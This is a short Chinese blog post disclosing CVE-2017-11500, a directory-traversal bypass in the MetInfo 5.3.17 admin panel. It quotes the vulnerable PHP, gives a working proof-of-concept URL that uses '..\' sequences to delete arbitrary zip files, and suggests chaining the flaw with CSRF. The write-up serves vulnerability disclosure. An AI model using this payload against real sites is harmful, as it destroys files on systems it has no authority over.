Metinfo最新版5.3.17后台目录遍历Bypass

0x00前言

CVE-2017-11500这个漏洞比较鸡肋,Metinfo最新版5.3.17后台某处目录遍历Bypass,可以删除任意zip文件。

0x02漏洞详情

1
2
3
4
5
6
7
8
# /admin/system/database/filedown.php
if($action=='delete'){
if(substr_count(trim($filenames),'../'))die('met2');
if(fileext($filenames)=='zip'){
@unlink('../../databack/'.$fileon.'/'.$filenames);
}
metsave($rurls,'',$depth);
}

检测如果$filenames包含../则直接退出,但是这个很容易利用..\即可Bypass,然后检测文件的后缀名如果是zip就直接删除文件,所以存在目录遍历删除任意的zip文件。
POC如下:

1
http://localhost/MetInfo5.3/admin/system/database/filedown.php?anyid=13&action=delete&filenames=..\..\..\..\..\..\..\..\..\..\..\..\..\..\test.zip&fileon=web&lang=cn

目录遍历

0x02小结

/admin/system/database/filedown.php文件的$filenames参数存在目录遍历删除任意的zip文件,此处没有CSRF防护,可以结合CSRF漏洞利用。